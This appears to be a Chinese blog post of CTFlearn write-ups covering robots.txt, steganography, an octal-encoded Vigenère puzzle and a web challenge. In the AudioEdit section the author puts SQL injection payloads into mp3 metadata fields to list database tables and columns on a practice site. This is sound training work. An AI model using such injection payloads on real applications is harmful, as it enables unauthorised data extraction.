CTF题目 June. 25th 2021

[Easy] [Web] Where Can My Robot Go?

Where do robots find what pages are on a website?

https://ctflearn.com/challenge/107

Hint:

What does disallow tell a robot?

题面指robots.txt文件。

访问https://ctflearn.com/robots.txt,显示“Disallow: /70r3hnanldfspufdsoifnlds.html”。

访问https://ctflearn.com/70r3hnanldfspufdsoifnlds.html得到flag。

[Easy] [Forensics] Simple Steganography

Think the flag is somewhere in there. Would you help me find it?

Hint-" Steghide Might be Helpfull"

https://ctflearn.com/challenge/download/894

下载下来一张图:

sudo apt install steghide安装steghide。

查看文件EXIF信息,有提示“关键词myadmin”。

steghide extract -sf 图片查看隐写的信息,要求输入密码,为“myadmin”。

执行完毕后生成一个raw.txt,里面的字符串用base64解密后得到flag。

[Medium] [Miscellaneous] Ambush Mission

Hi, i can’t tell you my name since now i’m in a mission. In case to arrest our fugitive target, our team had been intercepted communication between the target with his fellow and found this image (https://mega.nz/#!TKZ3DabY!BEUHD7VJvq_b-M22eD4VfHv_PPBnW2m7CZUfMbveZYw). It looks like they are going to meet in specific place, but we still don’t know the time yet. Can you help me?

下载下来一张图:

wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar下载stegsolve。

用Stegsolve打开图片,按>键直到Red plane 0,显示出一行字符串,逆转后Base64解码即为flag值。

P.S. 要注意字符串中,有几个难分清字符可能要尝试多次,大写i和小写L,大写o和数字0。

[Hard] [Cryptography] The Simpsons

Ya know, I was thinking… wouldn’t the Simpsons use octal as a base system? They have 8 fingers…

Oh, right! The problem! Ummm, something seems odd about this image…

https://mega.nz/#!yfp1nYrQ!LOz_eucuKkjAaDqVvz3GWgbfdKWn8BhussKZbx6bUMg

下载下来一张图:

发现文件的二进制数据结尾有一段神似Python的代码:

1
2
3
4
5

Realistically the Simpsons would use octal instead of decimal!
encoded = 152 162 152 145 162 167 150 172 153 162 145 170 141 162
key = chr(SolutionToDis(110 157 167 040 155 165 143 150 040 144 151 144 040 115 141 147 147 151 145 040 157 162 151 147 151 156 141 154 154 171 040 143 157 163 164 077 040 050 104 151 166 151 144 145 144 040 142 171 040 070 054 040 164 157 040 164 150 145 040 156 145 141 162 145 163 164 040 151 156 164 145 147 145 162 054 040 141 156 144 040 164 150 145 156 040 160 154 165 163 040 146 157 165 162 051))
key = key + key + chr(ord(key)-4)
print(DecodeDat(key=key,text=encoded))

先把两个字符串转成八进制看看:

1
2
3
4
5
6

encoded = "152 162 152 145 162 167 150 172 153 162 145 170 141 162"
encoded = [chr(int(i, base=8)) for i in encoded.split(" ")]
key = "110 157 167 040 155 165 143 150 040 144 151 144 040 115 141 147 147 151 145 040 157 162 151 147 151 156 141 154 154 171 040 143 157 163 164 077 040 050 104 151 166 151 144 145 144 040 142 171 040 070 054 040 164 157 040 164 150 145 040 156 145 141 162 145 163 164 040 151 156 164 145 147 145 162 054 040 141 156 144 040 164 150 145 156 040 160 154 165 163 040 146 157 165 162 051"
key = [chr(int(i, base=8)) for i in key.split(" ")]
print("".join(encoded))
print("".join(key))

得到输出:

jrjerwhzkrexar

How much did Maggie originally cost? (Divided by 8, to the nearest integer, and then plus four)

搜一下第二个问题,是$847.63。

再运行:

1
2
3

key = chr(round(847.63 / 8) + 4)
key = key + key + chr(ord(key) - 4)
print(key)

算得key是nnj

最后看题解,知道是Vigenère加密。

CyberChef的”Vigenère Decode”功能解密,得到flag的内容。

[Hard] [Web] AudioEdit

I made this cool site for editing audio files. Can you exploit it?

http://web.ctflearn.com/audioedit/

随便传一段小于1mb的mp3文件,发现会显示“Author”和“Title”两个信息,这两个信息来自上传的mp3文件详细信息“参与创作的艺术家”和“标题”,且均会去掉最后一个字符。

重复上传文件,发现提示文件已经存在,所以文件应该是存在某处的。

将作者改为a', 'aa') -- -; ,标题改为b', 'bb') -- -;,发现Author变为a,Title变为aa。猜测有类似insert into database (..., author, title, ...) values (..., author_value, title_value, ...);数据库插入语句,且author在title的前面。

将作者改为a', (select group_concat(table_name) from information_schema.tables WHERE table_schema=database())) -- - ,得到表名为audioedit

将作者改为a', (select group_concat(column_name) from information_schema.columns WHERE table_name='audioedit')) -- -得到列有idfileauthortitle

将作者改为a', (select group_concat(file) from audioedit as tmp)) -- -,发现有一个文件名为supersecretflagf1le.mp3

使用链接https://web.ctflearn.com/audioedit/supersecretflagf1le.mp3下载该mp3文件。

上传,然后将Visualisation滑动条拉到最右边,就能看见flag了。